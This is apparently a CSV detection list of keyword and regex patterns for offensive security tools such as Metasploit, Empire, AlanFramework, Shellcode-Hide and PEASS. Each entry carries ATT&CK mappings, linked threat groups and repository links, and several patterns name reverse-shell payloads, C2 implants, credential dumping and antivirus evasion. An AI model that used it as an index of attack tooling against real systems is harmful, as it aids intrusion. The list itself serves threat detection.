"*windows/x64/shell_reverse_tcp*",".{0,1000}windows\/x64\/shell_reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","62735"
"*windows\samdump.go*",".{0,1000}windows\\samdump\.go.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","62736"
"*windows_agent/asm/x64/alter_pe_sections*",".{0,1000}windows_agent\/asm\/x64\/alter_pe_sections.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","62738"
"*windows_agent/asm/x86/alter_pe_sections*",".{0,1000}windows_agent\/asm\/x86\/alter_pe_sections.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","62739"
"*windows_agent/dll_main.*",".{0,1000}windows_agent\/dll_main\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","62740"
"*windows_agent/exe_main.*",".{0,1000}windows_agent\/exe_main\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","62741"
"*windows_agent/win_*.c*",".{0,1000}windows_agent\/win_.{0,1000}\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","62742"
"*windows_agent/win_named_pipe.*",".{0,1000}windows_agent\/win_named_pipe\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","62743"
"*windows_agent/win_shell.*",".{0,1000}windows_agent\/win_shell\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","62744"
"*windows_autologin.md*",".{0,1000}windows_autologin\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62745"
"*windows_console_interceptor*dll_main.c*",".{0,1000}windows_console_interceptor.{0,1000}dll_main\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","62746"
"*windows_console_interceptor*exe_main.c*",".{0,1000}windows_console_interceptor.{0,1000}exe_main\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","62747"
"*windows_console_interceptor*interceptor.*",".{0,1000}windows_console_interceptor.{0,1000}interceptor\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","62748"
"*windows_credentials.py*",".{0,1000}windows_credentials\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","62749"
"*windows_downdate.exe*",".{0,1000}windows_downdate\.exe.{0,1000}","offensive_tool_keyword","WindowsDowndate","A tool that takes over Windows Updates to craft custom downgrades and expose past fixed vulnerabilities","T1072 - T1486 - T1505.002 - T1495 - T1499.004","TA0005 - TA0004 - TA0003 ","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/WindowsDowndate","1","0","N/A","N/A","10","7","663","88","2024-10-26T10:18:49Z","2024-01-08T19:42:47Z","62750"
"*windows_key.py*",".{0,1000}windows_key\.py.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","62751"
"*windows_recon.bat*",".{0,1000}windows_recon\.bat.{0,1000}","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","N/A","9","861","190","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z","62752"
"*windows_sam_hivenightmare.md*",".{0,1000}windows_sam_hivenightmare\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62753"
"*windows_sam_hivenightmare.rb*",".{0,1000}windows_sam_hivenightmare\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62754"
"*Windows_Trojan_Metasploit*",".{0,1000}Windows_Trojan_Metasploit.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002  -  T1021","TA0001 - TA0002 - TA0003","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Exploitation tool","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62755"
"*windows10_ntfs_crash_dos*",".{0,1000}windows10_ntfs_crash_dos.{0,1000}","offensive_tool_keyword","POC","PoC for a NTFS crash that I discovered. in various Windows versions Type of issue: denial of service. One can generate blue-screen-of-death using a handcrafted NTFS image. This Denial of Service type of attack. can be driven from user mode. limited user account or Administrator. It can even crash the system if it is in locked state.","T1499.002 - T1059.001 - T1538.002","TA0002 - TA0007 - TA0008","N/A","N/A","DDOS","https://github.com/mtivadar/windows10_ntfs_crash_dos","1","1","N/A","N/A","N/A","7","600","131","2024-05-04T20:18:36Z","2018-04-27T19:31:59Z","62756"
"*Windows7-BypassLogon-Screen.ino*",".{0,1000}Windows7\-BypassLogon\-Screen\.ino.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1056.001 - T1200 - T1036 - T1071","TA0002 - TA0005 - TA0011 - TA0006","N/A","N/A","Exploitation tool","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","N/A","2","143","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z","62757"
"*WindowsDefenderEventLog_Enum *",".{0,1000}WindowsDefenderEventLog_Enum\s.{0,1000}","offensive_tool_keyword","MDE_Enum","extract and display detailed information about Windows Defender exclusions and Attack Surface Reduction (ASR) rules","T1070.006","TA0005 - TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/0xsp-SRD/MDE_Enum","1","0","N/A","N/A","8","2","198","18","2024-06-10T18:40:27Z","2024-06-06T15:54:44Z","62758"
"*windows-defender-remover-main.zip*",".{0,1000}windows\-defender\-remover\-main\.zip.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","62759"
"*Windows-Downdate must be run as an Administrator*",".{0,1000}Windows\-Downdate\smust\sbe\srun\sas\san\sAdministrator.{0,1000}","offensive_tool_keyword","WindowsDowndate","A tool that takes over Windows Updates to craft custom downgrades and expose past fixed vulnerabilities","T1072 - T1486 - T1505.002 - T1495 - T1499.004","TA0005 - TA0004 - TA0003 ","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/WindowsDowndate","1","0","N/A","N/A","10","7","663","88","2024-10-26T10:18:49Z","2024-01-08T19:42:47Z","62760"
"*WindowsEnum -*",".{0,1000}WindowsEnum\s\-.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-WinEnum.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","62761"
"*WindowsExploits*",".{0,1000}WindowsExploits.{0,1000}","offensive_tool_keyword","Exploits","A curated archive of complied and tested public Windows exploits.","T1213 - T1210 - T1188 - T1055","TA0001 - TA0009 - TA0008","N/A","N/A","Exploitation tool","https://github.com/WindowsExploits/Exploits","1","1","N/A","N/A","N/A","10","1275","534","2020-05-29T19:09:52Z","2017-06-05T15:39:22Z","62762"
"*windows-exploit-suggester.*",".{0,1000}windows\-exploit\-suggester\..{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","N/A","10","10","1518","221","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z","62763"
"*windows-forkbomb.ino*",".{0,1000}windows\-forkbomb\.ino.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1056.001 - T1200 - T1036 - T1071","TA0002 - TA0005 - TA0011 - TA0006","N/A","N/A","Exploitation tool","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","N/A","2","143","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z","62764"
"*WindowsLies*BlockWindows*",".{0,1000}WindowsLies.{0,1000}BlockWindows.{0,1000}","offensive_tool_keyword","BlockWindows","Stop Windows 7 through 10 Nagging and Spying updates. Tasks. IPs. and services. Works with Windows 7 through 10","T1059 - T1562 - T1053 - T1543","TA0002 - TA0003 - TA0004 - TA0008","N/A","N/A","Defense Evasion","https://github.com/WindowsLies/BlockWindows","1","1","N/A","N/A","N/A","7","641","96","2020-04-11T15:38:12Z","2015-08-26T01:17:57Z","62765"
"*Windows-Post-Exploitation*",".{0,1000}Windows\-Post\-Exploitation.{0,1000}","offensive_tool_keyword","Windows-Post-Exploitation","Windows Post Exploitation list of tools on github. could also be related to folder name","T1021 - T1059 - T1078 - T1056 - T1028 - T1053 - T1003","TA0002 - TA0003 - TA0004 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/emilyanncr/Windows-Post-Exploitation","1","1","N/A","N/A","N/A","6","533","117","2021-09-20T01:47:13Z","2017-11-18T04:16:41Z","62766"
"*windows-privesc-check*",".{0,1000}windows\-privesc\-check.{0,1000}","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","N/A","9","861","190","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z","62767"
"*Windows-Privilege-Escalation*",".{0,1000}Windows\-Privilege\-Escalation.{0,1000}","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","N/A","9","861","190","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z","62768"
"*WindowsShareFinder.cs*",".{0,1000}WindowsShareFinder\.cs.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","N/A","9","8","712","80","2025-01-21T22:34:00Z","2021-05-31T19:46:57Z","62769"
"*windows-subbrute.zip*",".{0,1000}windows\-subbrute\.zip.{0,1000}","offensive_tool_keyword","subbrute","A DNS meta-query spider that enumerates DNS records and subdomains.","T1071.001 - T1083 - T1590.001","TA0043 - TA0007?","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/TheRook/subbrute","1","1","N/A","N/A","5","10","3422","661","2022-01-13T09:25:59Z","2012-06-10T01:08:20Z","62771"
"*window-state@safejka.eu*",".{0,1000}window\-state\@safejka\.eu.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","#email","N/A","10","10","N/A","N/A","N/A","N/A","62772"
"*WINEDEBUG=-all wine XiebroC2MAc*",".{0,1000}WINEDEBUG\=\-all\swine\sXiebroC2MAc.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","N/A","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","62773"
"*winexec.notepad.raw*",".{0,1000}winexec\.notepad\.raw.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","62774"
"*winexesvc32.exe*",".{0,1000}winexesvc32\.exe.{0,1000}","offensive_tool_keyword","winexe","Winexe remotely executes commands on Windows systems from GNU/Linux","T1059.004 - T1021.005 - T1078.003","TA0002 - TA0008 - TA0011","N/A","APT28","Lateral Movement","https://www.kali.org/tools/winexe/","1","1","#linux #windows","N/A","8","8","N/A","N/A","N/A","N/A","62775"
"*winexesvc64.exe*",".{0,1000}winexesvc64\.exe.{0,1000}","offensive_tool_keyword","winexe","Winexe remotely executes commands on Windows systems from GNU/Linux","T1059.004 - T1021.005 - T1078.003","TA0002 - TA0008 - TA0011","N/A","APT28","Lateral Movement","https://www.kali.org/tools/winexe/","1","1","#linux #windows","N/A","8","8","N/A","N/A","N/A","N/A","62776"
"*WinhttpShellcode.cpp*",".{0,1000}WinhttpShellcode\.cpp.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","62778"
"*WinhttpShellcode.exe*",".{0,1000}WinhttpShellcode\.exe.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","62779"
"*WinhttpShellcode.sln*",".{0,1000}WinhttpShellcode\.sln.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","62780"
"*WinhttpShellcode.vcxproj*",".{0,1000}WinhttpShellcode\.vcxproj.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","62781"
"*Win-Ops-Master.*",".{0,1000}Win\-Ops\-Master\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62782"
"*Winpayloads*",".{0,1000}Winpayloads.{0,1000}","offensive_tool_keyword","Winpayloads","Undetectable Windows Payload Generation with extras Running on Python2.7","T1203 - T1027 - T1059","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/nccgroup/Winpayloads","1","1","N/A","N/A","N/A","10","1593","335","2022-11-08T08:14:23Z","2015-10-09T09:29:49Z","62783"
"*winPEAS.bat*",".{0,1000}winPEAS\.bat.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","62784"
"*winPEAS.bat*",".{0,1000}winPEAS\.bat.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","62785"
"*winPEAS.bat*",".{0,1000}winPEAS\.bat.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","1","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","62786"
